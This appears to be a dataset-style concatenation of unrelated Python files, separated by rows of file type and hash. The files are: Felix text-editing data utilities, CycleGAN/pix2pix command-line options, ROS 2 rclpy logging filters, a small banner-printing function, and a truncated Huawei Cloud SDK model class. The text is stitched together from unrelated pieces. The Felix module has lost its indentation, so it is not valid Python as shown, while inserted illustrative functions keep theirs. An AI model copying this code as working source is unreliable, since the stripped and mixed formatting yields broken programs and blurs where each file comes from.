# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for Felix."""
import json
from typing import Callable, Iterator, Mapping, MutableSequence, NamedTuple, Optional, Sequence, Tuple, Union
from absl import logging
from six import with_metaclass
import tensorflow as tf
import felix_constants as constants
import tokenization
FeedDict = Mapping[str, Sequence[Sequence[float]]]
SourceTargetPair = Tuple[MutableSequence[str], str]
def get_token_list(text):
"""Returns a list of tokens.
This function expects that the tokens in the text are separated by space
character(s). Example: "ca n't , touch". This is the case at least for the
public DiscoFuse and WikiSplit datasets.
Args:
text: String to be split into tokens.
"""
return text.split()
def build_feed_dict(tokens,
tokenizer,
target_tokens = None,
max_seq_length = 128,
max_predictions_per_seq = 20):
"""Returns a dictionary used for predicting/training the insertion model.
Converts a list of source tokens, containing masks, to a dictionary of
features used by a TF model. If a target sequence is provided, then the
targets for the MASKs are set.
Args:
tokens: Input tokens, with mask tokens.
tokenizer: Tokenizer used to convert tokens to IDs.
target_tokens: (Optional) The targets of the mask tokens.
max_seq_length: Maximum sequence length.
max_predictions_per_seq: Maximum number of mask tokens.
Returns:
Dictionary with model features or None if `len(tokens) > max_seq_length` or
if the number of MASKs is larger than `max_predictions_per_seq`.
"""
mask_position = []
mask_target_id = []
mask_target_weight = []
for idx, token in enumerate(tokens):
if token != constants.MASK:
continue
mask_position.append(idx)
if target_tokens:
mask_target_id += tokenizer.convert_tokens_to_ids([target_tokens[idx]])
else:
mask_target_id.append(0)
mask_target_weight.append(1.0)
# Deleted tokens (bracketed by unused) should have a segment_id of 2.
unused = False
segment_ids = []
for token in tokens:
if token == constants.DELETE_SPAN_START or unused:
unused = True
segment_ids.append(2)
else:
segment_ids.append(0)
if token == constants.DELETE_SPAN_END:
unused = False
input_mask = [1] * len(tokens)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
assert len(segment_ids) == len(input_ids)
# Padding.
while len(input_ids) < max_seq_length:
segment_ids.append(0)
input_ids.append(0)
input_mask.append(0)
if len(input_ids) > max_seq_length:
input_ids = input_ids[:max_seq_length]
segment_ids = segment_ids[:max_seq_length]
input_mask = input_mask[:max_seq_length]
#return None
assert len(input_ids) == max_seq_length, "len(input_ids) = {}".format(
len(input_ids))
assert len(input_mask) == max_seq_length, "len(input_mask) = {}".format(
len(input_mask))
assert len(segment_ids) == max_seq_length, "len(segment_ids) = {}".format(
len(segment_ids))
if len(mask_position) > max_predictions_per_seq:
mask_position = mask_position[:max_predictions_per_seq]
#return None
while len(mask_position) < max_predictions_per_seq:
mask_target_weight.append(0)
mask_position.append(0)
mask_target_id.append(0)
feed_dict = {
"input_ids": [input_ids],
"input_mask": [input_mask],
"segment_ids": [segment_ids],
"masked_lm_positions": [mask_position],
"masked_lm_ids": [mask_target_id],
"masked_lm_weights": [mask_target_weight],
}
return feed_dict
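# A minimal sketch (not part of the original Felix code) of what build_feed_dict
# returns. `_ToyTokenizer` is a made-up stand-in used only for illustration; the
# real pipeline passes a BERT tokenizer from the `tokenization` module.
def _example_build_feed_dict():
  class _ToyTokenizer(object):
    _vocab = {constants.MASK: 1, "[CLS]": 2, "[SEP]": 3, "hello": 4, "world": 5}
    def convert_tokens_to_ids(self, tokens):
      return [self._vocab.get(token, 0) for token in tokens]
  tokens = ["[CLS]", "hello", constants.MASK, "[SEP]"]
  target_tokens = ["[CLS]", "hello", "world", "[SEP]"]
  feed_dict = build_feed_dict(tokens, _ToyTokenizer(), target_tokens,
                              max_seq_length=8, max_predictions_per_seq=2)
  # Sequence features are padded to max_seq_length, mask features to
  # max_predictions_per_seq.
  assert len(feed_dict["input_ids"][0]) == 8
  assert len(feed_dict["masked_lm_positions"][0]) == 2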
def _int_feature(values):
return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(values):
return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _text_feature(values):
return tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[element.encode("utf8") for element in values]))
def feed_dict_to_tf_example(feed_dict,
source = None,
target = None):
"""Returns a TF example for MLM insertion model."""
features = {
"input_ids": _int_feature(feed_dict["input_ids"][0]),
"input_mask": _int_feature(feed_dict["input_mask"][0]),
"segment_ids": _int_feature(feed_dict["segment_ids"][0]),
"masked_lm_positions": _int_feature(feed_dict["masked_lm_positions"][0]),
"masked_lm_ids": _int_feature(feed_dict["masked_lm_ids"][0]),
"masked_lm_weights": _float_feature(feed_dict["masked_lm_weights"][0]),
}
if source:
features["text_source"] = _text_feature([source])
if target:
features["text_target"] = _text_feature([target])
return tf.train.Example(features=tf.train.Features(feature=features))
class Features(NamedTuple):
"""A data holder for various features that can be read from files."""
source: MutableSequence[str]
target: str
output_variant_id: Optional[int] = None
@staticmethod
def from_source_target_pair(pair):
return Features(source=pair[0], target=pair[1])
SourcesAndFeaturesPair = Tuple[MutableSequence[str], Features]
def text_file_iterator(fname_pattern):
"""Returns an iterator over lines of the files covered by fname_pattern."""
for fname in get_filenames(fname_pattern):
with tf.io.gfile.GFile(fname, "r") as f:
for line in f:
yield line
def skip_header_text_file_iterator(fname_pattern):
"""Similar to text_file_iterator, but skipping the first line of each file."""
for fname in get_filenames(fname_pattern):
tf.io.gfile.GFile(fname)
it = tf.io.gfile.GFile(fname, "r")
it.next() # skip the header line
for line in it:
yield line
def get_parse_tsv_line_fn(
return_none_on_error = False,
reverse = False):
"""A higher-order function producing TSV line-parsing functions.
Args:
return_none_on_error: Whether to return None on encountering an error (such
as too few TSV columns) rather than raising an Error.
reverse: When True, returns ([`target`], `source`) instead of ([`source`],
      `target`). Useful for working with "reverse" (a.k.a. "noise") models that
      go from `target` to `source`.
Returns:
A parsing function that goes from a text line to a ([source], target) pair
(or a ([`target`], `source`) pair when `reverse`=True).
"""
def parse_tsv_line(line):
"""Parses the first two columns, `source` and `target`, from a TSV line.
Any further columns are ignored.
Args:
line: A text line.
Returns:
a tuple ([source], target), with `source` being wrapped in a list.
Raises:
ValueError: when the line has less than two TSV columns and
`return_none_on_error`=False.
"""
split = line.rstrip("\n").split("\t")
if len(split) < 2:
message = 'TSV line has less than two tab-delimited fields:\n"{}"'.format(
line)
if return_none_on_error:
logging.warning(message)
return None
else:
raise ValueError(message)
source, target = split[:2]
if reverse:
return [target], source
else:
return [source], target
return parse_tsv_line
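# Illustrative check (not part of the original Felix code): how the returned
# parser splits a made-up TSV line, and how `reverse` swaps the two columns.
def _example_parse_tsv_line():
  parse_fn = get_parse_tsv_line_fn()
  assert parse_fn("src text\ttgt text\textra col\n") == (["src text"], "tgt text")
  reverse_fn = get_parse_tsv_line_fn(reverse=True)
  assert reverse_fn("src text\ttgt text\n") == (["tgt text"], "src text")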
def parse_discofuse_line(line):
"""Parses a DiscoFuse example from a line from a TSV file.
The documentation for this format:
https://github.com/google-research-datasets/discofuse#data-format
Args:
line: A line from a TSV file.
Returns:
A pair (<source texts list>, <target text>).
"""
coherent_1, coherent_2, incoherent_1, incoherent_2, _, _, _, _ = (
line.rstrip("\n").split("\t"))
# Strip because the second coherent sentence might be empty.
fusion = (coherent_1 + " " + coherent_2).strip()
return [incoherent_1, incoherent_2], fusion
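# Illustrative check (not part of the original Felix code): a made-up DiscoFuse
# row with its eight tab-separated columns, of which only the first four carry
# text here.
def _example_parse_discofuse_line():
  line = "Fused part one .\tFused part two .\tFirst sentence .\tSecond sentence .\t\t\t\t\n"
  sources, fusion = parse_discofuse_line(line)
  assert sources == ["First sentence .", "Second sentence ."]
  assert fusion == "Fused part one . Fused part two ."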
def parse_iterate_plain_line(line):
return _parse_iterate_line(line, with_intent=False)
def parse_iterate_intent_line(line):
return _parse_iterate_line(line, with_intent=True)
def _parse_iterate_line(line, with_intent=False):
"""Parses a IteraTE example from a line from a (line-by-line) JSON file.
Args:
line: A JSON line from a line-by-line JSON file.
Returns:
A tuple ([source], target), with `source` being wrapped in a list.
"""
json_line = json.loads(line)
if with_intent:
src = json_line["before_sent_with_intent"]
else:
src = json_line["before_sent"]
tgt = json_line["after_sent"]
return [src], tgt
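# Illustrative check (not part of the original Felix code): parsing a made-up
# IteraTE JSON line. The field values, including the "<clarity>" intent marker,
# are invented for this sketch.
def _example_parse_iterate_line():
  line = ('{"before_sent": "src .", '
          '"before_sent_with_intent": "<clarity> src .", '
          '"after_sent": "tgt ."}')
  assert parse_iterate_plain_line(line) == (["src ."], "tgt .")
  assert parse_iterate_intent_line(line) == (["<clarity> src ."], "tgt .")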
def yield_sources_and_targets(
input_file_pattern,
input_format,
source_key = None,
target_key = None):
"""Produces an iterator over pairs (source list, targets) parsed from a file.
Args:
input_file_pattern: Path/pattern to the input file(s).
input_format: Format of the input file.
source_key: Source text feature name. Only considered when
`input_format=sstable`.
target_key: Target text feature name. Only considered when
`input_format=sstable`.
Yields:
Pairs of (list of source texts, target text).
"""
data_spec = {
"wikisplit": (text_file_iterator, get_parse_tsv_line_fn()),
"discofuse": (skip_header_text_file_iterator, parse_discofuse_line),
"IteraTE_Plain": (skip_header_text_file_iterator, parse_iterate_plain_line),
"IteraTE_Intent": (skip_header_text_file_iterator, parse_iterate_intent_line),
}
if input_format not in data_spec:
raise ValueError("Unsupported input_format: {}".format(input_format))
file_iterator_fn, parse_fn = data_spec[input_format]
for item in file_iterator_fn(input_file_pattern):
# Pytype correctly infers possible types for `item`, but does not handle
# well the various possible signatures of `parse_fn`.
parsed_item = parse_fn(item) # pytype: disable=wrong-arg-types
if parsed_item is not None:
yield parsed_item
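# A minimal sketch (not part of the original Felix code) of reading a two-column
# TSV in the "wikisplit" input format; the temporary file contents are made up.
def _example_yield_sources_and_targets():
  import tempfile
  with tempfile.NamedTemporaryFile("w", suffix=".tsv", delete=False) as tmp:
    tmp.write("First source .\tFirst target .\n")
    tmp.write("Second source .\tSecond target .\n")
  for sources, target in yield_sources_and_targets(tmp.name, "wikisplit"):
    print(sources, "->", target)  # e.g. ['First source .'] -> First target .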
def get_filenames(patterns):
"""Obtains a list of filenames corresponding to the pattern.
  Supports glob patterns and plain file names, as well as comma-separated
  lists of either.
Caveat: Will not work if the patterns have commas (',') in them.
Args:
patterns: File pattern or comma-separated patterns.
Raises:
RuntimeError: If `patterns` is valid but cannot be expanded/does not match
any files.
Returns:
list of individual paths to each file.
"""
all_files = []
for pattern in patterns.split(","):
# points to a specific file.
files = tf.io.gfile.glob(pattern)
if not files:
raise RuntimeError("Could not find files matching: %s" % pattern)
all_files.extend(files)
return all_files
def read_label_map(
path,
use_str_keys = False):
"""Returns label map read from the given path.
Args:
path: Path to the label map file.
use_str_keys: Whether to use label strings as keys instead of
(base tag, num insertions) tuple keys. The latter is only used by
FelixInsert.
"""
label_map = {}
with tf.io.gfile.GFile(path) as f:
if path.endswith(".json"):
label_map = json.load(f)
else:
for tag in f:
tag = tag.strip()
# Empty lines are skipped.
if tag:
if tag in label_map:
raise ValueError("Duplicate label in label_map: {}".format(tag))
label_map[tag] = len(label_map)
if not use_str_keys:
new_label_map = {}
for key, val in label_map.items():
if "|" in key:
pos_pipe = key.index("|")
new_key = (key[:pos_pipe], int(key[pos_pipe + 1:]))
else:
new_key = (key, 0)
new_label_map[new_key] = val
label_map = new_label_map
return label_map
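# Illustrative sketch (not part of the original Felix code): writing a label map
# with one tag per line and reading it back, first with plain string keys and
# then with the (base tag, insertion count) tuple keys used by FelixInsert.
# The path below is made up for the example.
def _example_read_label_map():
  path = "/tmp/felix_example_label_map.txt"
  with tf.io.gfile.GFile(path, "w") as f:
    f.write("KEEP\nDELETE\nKEEP|1\n")
  assert read_label_map(path, use_str_keys=True) == {
      "KEEP": 0, "DELETE": 1, "KEEP|1": 2}
  assert read_label_map(path, use_str_keys=False) == {
      ("KEEP", 0): 0, ("DELETE", 0): 1, ("KEEP", 1): 2}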
|
py | 1a304f7ea1d05edd53437f4b33cf05368d9e2c67 | import argparse
import os
from util import util
import torch
import models
import data
class BaseOptions():
"""This class defines options used during both training and test time.
It also implements several helper functions such as parsing, printing, and saving the options.
It also gathers additional options defined in <modify_commandline_options> functions in both dataset class and model class.
"""
def __init__(self):
"""Reset the class; indicates the class hasn't been initailized"""
self.initialized = False
def initialize(self, parser):
"""Define the common options that are used in both training and test."""
# basic parameters
parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')
parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')
# model parameters
parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]')
parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale')
parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale')
parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')
parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')
parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')
parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]')
parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers')
parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]')
parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]')
parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')
parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')
parser.add_argument('--conv_type', type=str, default='conv2d', help='conv type [conv2d | dcn_v1 | dcn_v2 | mixed]')
# dataset parameters
parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]')
parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')
parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')
parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')
parser.add_argument('--batch_size', type=int, default=1, help='input batch size')
parser.add_argument('--load_size', type=int, default=286, help='scale images to this size')
parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size')
parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')
parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')
parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation')
parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML')
# additional parameters
parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')
parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')
parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')
parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')
self.initialized = True
return parser
def gather_options(self):
"""Initialize our parser with basic options(only once).
Add additional model-specific and dataset-specific options.
These options are defined in the <modify_commandline_options> function
in model and dataset classes.
"""
if not self.initialized: # check if it has been initialized
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser = self.initialize(parser)
# get the basic options
opt, _ = parser.parse_known_args()
# modify model-related parser options
model_name = opt.model
model_option_setter = models.get_option_setter(model_name)
parser = model_option_setter(parser, self.isTrain)
opt, _ = parser.parse_known_args() # parse again with new defaults
# modify dataset-related parser options
dataset_name = opt.dataset_mode
dataset_option_setter = data.get_option_setter(dataset_name)
parser = dataset_option_setter(parser, self.isTrain)
# save and return the parser
self.parser = parser
return parser.parse_args()
def print_options(self, opt):
"""Print and save options
It will print both current options and default values(if different).
It will save options into a text file / [checkpoints_dir] / opt.txt
"""
message = ''
message += '----------------- Options ---------------\n'
for k, v in sorted(vars(opt).items()):
comment = ''
default = self.parser.get_default(k)
if v != default:
comment = '\t[default: %s]' % str(default)
message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
print(message)
# save to the disk
expr_dir = os.path.join(opt.checkpoints_dir, opt.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, '{}_opt.txt'.format(opt.phase))
with open(file_name, 'wt') as opt_file:
opt_file.write(message)
opt_file.write('\n')
def parse(self):
"""Parse our options, create checkpoints directory suffix, and set up gpu device."""
opt = self.gather_options()
opt.isTrain = self.isTrain # train or test
# process opt.suffix
if opt.suffix:
suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else ''
opt.name = opt.name + suffix
self.print_options(opt)
# set gpu ids
str_ids = opt.gpu_ids.split(',')
opt.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
opt.gpu_ids.append(id)
if len(opt.gpu_ids) > 0:
torch.cuda.set_device(opt.gpu_ids[0])
self.opt = opt
return self.opt
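# A minimal sketch (not part of the original repository) of how BaseOptions is
# meant to be specialized; the real repo defines TrainOptions and TestOptions in
# separate modules and builds options with e.g. `opt = TrainOptions().parse()`.
class _ExampleTestOptions(BaseOptions):
    """Illustrative test-time options: reuse the shared flags and disable training."""
    def initialize(self, parser):
        parser = BaseOptions.initialize(self, parser)  # shared options defined above
        parser.add_argument('--results_dir', type=str, default='./results/', help='saves results here.')
        self.isTrain = False
        return parser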
|
py | 1a304fb8b4003bdc8146cbb2fd665e2bee8eff90 | # Copyright 2017 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from collections import OrderedDict
import inspect
import os
from rclpy.clock import Clock
from rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy
# Known filenames from which logging methods can be called (will be ignored in `_find_caller`).
_internal_callers = []
# This will cause rclpy filenames to be registered in `_internal_callers` on first logging call.
_populate_internal_callers = True
def _find_caller(frame):
"""Get the first calling frame that is outside of rclpy."""
global _populate_internal_callers
global _internal_callers
if _populate_internal_callers:
# Populate the list of internal filenames from which logging methods can be called.
# This has to be done from within a function to avoid cyclic module imports.
import rclpy.logging
# Extend the list to preserve any filenames that may have been added by third parties.
# Note: the call to `realpath` will also resolve mixed slashes that can result on Windows.
_internal_callers.extend([
os.path.realpath(__file__),
os.path.realpath(rclpy.logging.__file__),
])
_populate_internal_callers = False
file_path = os.path.realpath(inspect.getframeinfo(frame).filename)
while any(f in file_path for f in _internal_callers):
frame = frame.f_back
file_path = os.path.realpath(inspect.getframeinfo(frame).filename)
return frame
class CallerId(
namedtuple('CallerId', ['function_name', 'file_path', 'line_number', 'last_index'])):
def __new__(cls, frame=None):
if not frame:
frame = _find_caller(inspect.currentframe())
return super(CallerId, cls).__new__(
cls,
function_name=frame.f_code.co_name,
file_path=os.path.abspath(inspect.getframeinfo(frame).filename),
line_number=frame.f_lineno,
last_index=frame.f_lasti, # To distinguish between two callers on the same line
)
class LoggingFilter:
"""Base class for logging filters."""
"""
Parameters of a filter and their default value, if appropriate.
A default value of None makes a parameter required.
"""
params = {}
"""
Initialize the context of a logging call, e.g. declare variables needed for
determining the log condition and add them to the context.
"""
@classmethod
def initialize_context(cls, context, **kwargs):
# Store all parameters in the context so we can check that users never try to change them.
for param in cls.params:
context[param] = kwargs.get(param, cls.params[param])
if context[param] is None:
raise TypeError(
'Required parameter "{0}" was not specified for logging filter "{1}"'
.format(param, cls.__name__))
"""
Decide if it's appropriate to log given a context, and update the context accordingly.
"""
@staticmethod
def should_log(context):
return True
class Once(LoggingFilter):
"""Ignore all log calls except the first one."""
params = {
'once': None,
}
@classmethod
def initialize_context(cls, context, **kwargs):
super(Once, cls).initialize_context(context, **kwargs)
context['has_been_logged_once'] = False
@staticmethod
def should_log(context):
logging_condition = False
if not context['has_been_logged_once']:
logging_condition = True
context['has_been_logged_once'] = True
return logging_condition
class Throttle(LoggingFilter):
"""Ignore log calls if the last call is not longer ago than the specified duration."""
params = {
'throttle_duration_sec': None,
'throttle_time_source_type': Clock(),
}
@classmethod
def initialize_context(cls, context, **kwargs):
super(Throttle, cls).initialize_context(context, **kwargs)
context['throttle_last_logged'] = 0
if not isinstance(context['throttle_time_source_type'], Clock):
raise ValueError(
'Received throttle_time_source_type of "{0}" '
'is not a clock instance'
.format(context['throttle_time_source_type']))
@staticmethod
def should_log(context):
logging_condition = True
now = context['throttle_time_source_type'].now().nanoseconds
next_log_time = context['throttle_last_logged'] + (context['throttle_duration_sec'] * 1e+9)
logging_condition = now >= next_log_time
if logging_condition:
context['throttle_last_logged'] = now
return logging_condition
class SkipFirst(LoggingFilter):
"""Ignore the first log call but process all subsequent calls."""
params = {
'skip_first': None,
}
@classmethod
def initialize_context(cls, context, **kwargs):
super(SkipFirst, cls).initialize_context(context, **kwargs)
context['first_has_been_skipped'] = False
@staticmethod
def should_log(context):
logging_condition = True
if not context['first_has_been_skipped']:
logging_condition = False
context['first_has_been_skipped'] = True
return logging_condition
# The ordering of this dictionary defines the order in which filters will be processed.
supported_filters = OrderedDict()
supported_filters['throttle'] = Throttle
supported_filters['skip_first'] = SkipFirst
supported_filters['once'] = Once
def get_filters_from_kwargs(**kwargs):
"""
Determine which filters have had parameters specified in the given keyword arguments.
Returns the list of filters using the order specified by `supported_filters`.
"""
detected_filters = []
all_supported_params = []
for supported_filter, filter_class in supported_filters.items():
filter_params = filter_class.params.keys()
all_supported_params.extend(filter_params)
if any(kwargs.get(param_name) for param_name in filter_params):
detected_filters.append(supported_filter)
# Check that all required parameters (with no default value) have been specified
for detected_filter in detected_filters:
for param_name, default_value in supported_filters[detected_filter].params.items():
if param_name in kwargs:
continue
# Param not specified; use the default.
if default_value is None:
raise TypeError(
'required parameter "{0}" not specified '
                    'but is required for the logging filter "{1}"'.format(
param_name, detected_filter))
kwargs[param_name] = default_value
for kwarg in kwargs:
if kwarg not in all_supported_params:
raise TypeError(
'parameter "{0}" is not one of the recognized logging options "{1}"'
.format(kwarg, all_supported_params)
)
return detected_filters
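# Illustrative check (not part of rclpy): which filters the keyword arguments
# select, in the processing order defined by `supported_filters` above.
def _example_get_filters_from_kwargs():
    detected = get_filters_from_kwargs(once=True, throttle_duration_sec=0.5)
    assert detected == ['throttle', 'once']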
class RcutilsLogger:
def __init__(self, name=''):
self.name = name
self.contexts = {}
def get_child(self, name):
if not name:
raise ValueError('Child logger name must not be empty.')
if self.name:
# Prepend the name of this logger
name = self.name + '.' + name
return RcutilsLogger(name=name)
def set_level(self, level):
from rclpy.logging import LoggingSeverity
level = LoggingSeverity(level)
return _rclpy.rclpy_logging_set_logger_level(self.name, level)
def get_effective_level(self):
from rclpy.logging import LoggingSeverity
level = LoggingSeverity(
_rclpy.rclpy_logging_get_logger_effective_level(self.name))
return level
def is_enabled_for(self, severity):
from rclpy.logging import LoggingSeverity
severity = LoggingSeverity(severity)
return _rclpy.rclpy_logging_logger_is_enabled_for(self.name, severity)
def log(self, message, severity, **kwargs):
r"""
Log a message with the specified severity.
The message will not be logged if:
* the logger is not enabled for the message's severity (the message severity is less than
the level of the logger), or
* a logging filter causes the message to be skipped.
.. note::
Logging filters will only be evaluated if the logger is enabled for the message's
severity.
:param message str: message to log.
:param severity: severity of the message.
:type severity: :py:class:LoggingSeverity
:keyword name str: name of the logger to use.
:param \**kwargs: optional parameters for logging filters (see below).
:Keyword Arguments:
* *throttle_duration_sec* (``float``) --
Duration of the throttle interval for the :py:class:Throttle: filter.
* *throttle_time_source_type* (``str``) --
Optional time source type for the :py:class:Throttle: filter (default of
``RCUTILS_STEADY_TIME``)
* *skip_first* (``bool``) --
If True, enable the :py:class:SkipFirst: filter.
* *once* (``bool``) --
If True, enable the :py:class:Once: filter.
:returns: False if a filter caused the message to not be logged; True otherwise.
:raises: TypeError on invalid filter parameter combinations.
:raises: ValueError on invalid parameters values.
:rtype: bool
"""
# Gather context info and check filters only if the severity is appropriate.
if not self.is_enabled_for(severity):
return False
from rclpy.logging import LoggingSeverity
severity = LoggingSeverity(severity)
name = kwargs.pop('name', self.name)
# Infer the requested log filters from the keyword arguments
detected_filters = get_filters_from_kwargs(**kwargs)
# Get/prepare the context corresponding to the caller.
caller_id = CallerId()
if caller_id not in self.contexts:
context = {'name': name, 'severity': severity}
for detected_filter in detected_filters:
if detected_filter in supported_filters:
supported_filters[detected_filter].initialize_context(context, **kwargs)
context['filters'] = detected_filters
self.contexts[caller_id] = context
else:
context = self.contexts[caller_id]
# Don't support any changes to the logger.
if severity != context['severity']:
raise ValueError('Logger severity cannot be changed between calls.')
if name != context['name']:
raise ValueError('Logger name cannot be changed between calls.')
if detected_filters != context['filters']:
raise ValueError('Requested logging filters cannot be changed between calls.')
for detected_filter in detected_filters:
filter_params = supported_filters[detected_filter].params
if any(context[p] != kwargs.get(p, filter_params[p]) for p in filter_params):
raise ValueError(
'Logging filter parameters cannot be changed between calls.')
# Check if any filter determines the message shouldn't be processed.
# Note(dhood): even if a message doesn't get logged, a filter might still update its state
# as if it had been. This matches the behavior of the C logging macros provided by rcutils.
for logging_filter in context['filters']:
if not supported_filters[logging_filter].should_log(context):
return False
# Call the relevant function from the C extension.
_rclpy.rclpy_logging_rcutils_log(
severity, name, message,
caller_id.function_name, caller_id.file_path, caller_id.line_number)
return True
def debug(self, message, **kwargs):
"""Log a message with `DEBUG` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.DEBUG, **kwargs)
def info(self, message, **kwargs):
"""Log a message with `INFO` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.INFO, **kwargs)
def warning(self, message, **kwargs):
"""Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.WARN, **kwargs)
def warn(self, message, **kwargs):
"""
Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.
Deprecated in favor of :py:classmethod:RcutilsLogger.warning:.
"""
return self.warning(message, **kwargs)
def error(self, message, **kwargs):
"""Log a message with `ERROR` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.ERROR, **kwargs)
def fatal(self, message, **kwargs):
"""Log a message with `FATAL` severity via :py:classmethod:RcutilsLogger.log:."""
from rclpy.logging import LoggingSeverity
return self.log(message, LoggingSeverity.FATAL, **kwargs)
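# Illustrative usage sketch (not part of rclpy): driving the logging filters above
# through a node's logger. Running it requires a sourced ROS 2 environment.
def _example_logger_usage():
    import rclpy
    rclpy.init()
    node = rclpy.create_node('logging_filter_example')
    logger = node.get_logger()
    for i in range(5):
        logger.info('printed on every iteration: {}'.format(i))
        logger.warning('printed only once', once=True)
        logger.warning('printed at most once per second', throttle_duration_sec=1.0)
        logger.info('skipped on the first iteration only', skip_first=True)
    node.destroy_node()
    rclpy.shutdown()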
|
py | 1a30507e3719dd13640618cadf10306d4426c321 | def escreva(txt):
vzs = int(len(txt)) + 2
print('~' * vzs)
print(f' {txt} ')
print('~' * vzs)
escreva('Ian Stigliano')
escreva('Aprenda Python')
escreva('Curso em Python do Guanabara')
escreva('Ian') |
py | 1a30509d30a1bf83e042370ff613f420542870b5 | # coding: utf-8
import pprint
import re
import six
class ImageDetectionResultDetailPolitics:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'confidence': 'float',
'label': 'str',
'face_detail': 'ImageDetectionResultDetailFaceDetail'
}
attribute_map = {
'confidence': 'confidence',
'label': 'label',
'face_detail': 'face_detail'
}
def __init__(self, confidence=None, label=None, face_detail=None):
"""ImageDetectionResultDetailPolitics - a model defined in huaweicloud sdk"""
self._confidence = None
self._label = None
self._face_detail = None
self.discriminator = None
if confidence is not None:
self.confidence = confidence
if label is not None:
self.label = label
if face_detail is not None:
self.face_detail = face_detail
@property
def confidence(self):
"""Gets the confidence of this ImageDetectionResultDetailPolitics.
:return: The confidence of this ImageDetectionResultDetailPolitics.
:rtype: float
"""
return self._confidence
@confidence.setter
def confidence(self, confidence):
"""Sets the confidence of this ImageDetectionResultDetailPolitics.
:param confidence: The confidence of this ImageDetectionResultDetailPolitics.
:type: float
"""
self._confidence = confidence
@property
def label(self):
"""Gets the label of this ImageDetectionResultDetailPolitics.
:return: The label of this ImageDetectionResultDetailPolitics.
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this ImageDetectionResultDetailPolitics.
:param label: The label of this ImageDetectionResultDetailPolitics.
:type: str
"""
self._label = label
@property
def face_detail(self):
"""Gets the face_detail of this ImageDetectionResultDetailPolitics.
:return: The face_detail of this ImageDetectionResultDetailPolitics.
:rtype: ImageDetectionResultDetailFaceDetail
"""
return self._face_detail
@face_detail.setter
def face_detail(self, face_detail):
"""Sets the face_detail of this ImageDetectionResultDetailPolitics.
